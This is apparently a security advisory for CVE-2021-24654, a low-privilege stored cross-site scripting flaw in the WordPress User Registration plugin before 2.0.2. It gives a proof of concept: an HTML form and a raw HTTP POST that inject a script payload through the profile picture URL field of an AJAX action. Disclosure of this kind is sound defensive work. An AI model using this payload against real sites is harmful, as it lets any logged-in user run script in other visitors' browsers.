User Registration < 2.0.2 – Low Privilege Stored Cross-Site Scripting | CVE 2021-24654

Description

The plugin does not properly sanitise the user_registration_profile_pic_url value when submitted directly via the user_registration_update_profile_details AJAX action. This could allow any authenticated user, such as subscriber, to perform Stored Cross-Site attacks when their profile is viewed

Proof of Concept

1. Login as any user (such as subscriber) and go to the edit profile page (the one generated by the plugin).
2. View the page source and get json var nonce "user_registration_profile_details_save" 
3. Add the below form to the page and and replace the security nonce with the one from step 2, then submit it.
4. View the profile page (as any user) to trigger the XSS.

<form action="/wp-admin/admin-ajax.php" method="post">
  <input type="text"  name="action" value="user_registration_update_profile_details"><br>
    <input type="text"  name="security" value="143544a1fb"><br>
  <input type="text"  name="form_data" value='{"user_registration_profile_pic_url":{"field_name":"user_registration_profile_pic_url","value":"\"><script>alert(1)<\/script>"}}'><br><br>
  <input type="submit" value="Submit">
</form>


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
Connection: close
Cookie: [your cookies, as any user]
Upgrade-Insecure-Requests: 1

action=user_registration_update_profile_details&security=143544a1fb&form_data=%7B%22user_registration_profile_pic_url%22%3A%7B%22field_name%22%3A%22user_registration_profile_pic_url%22%2C%22value%22%3A%22%5C%22%3E%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E%22%7D%7D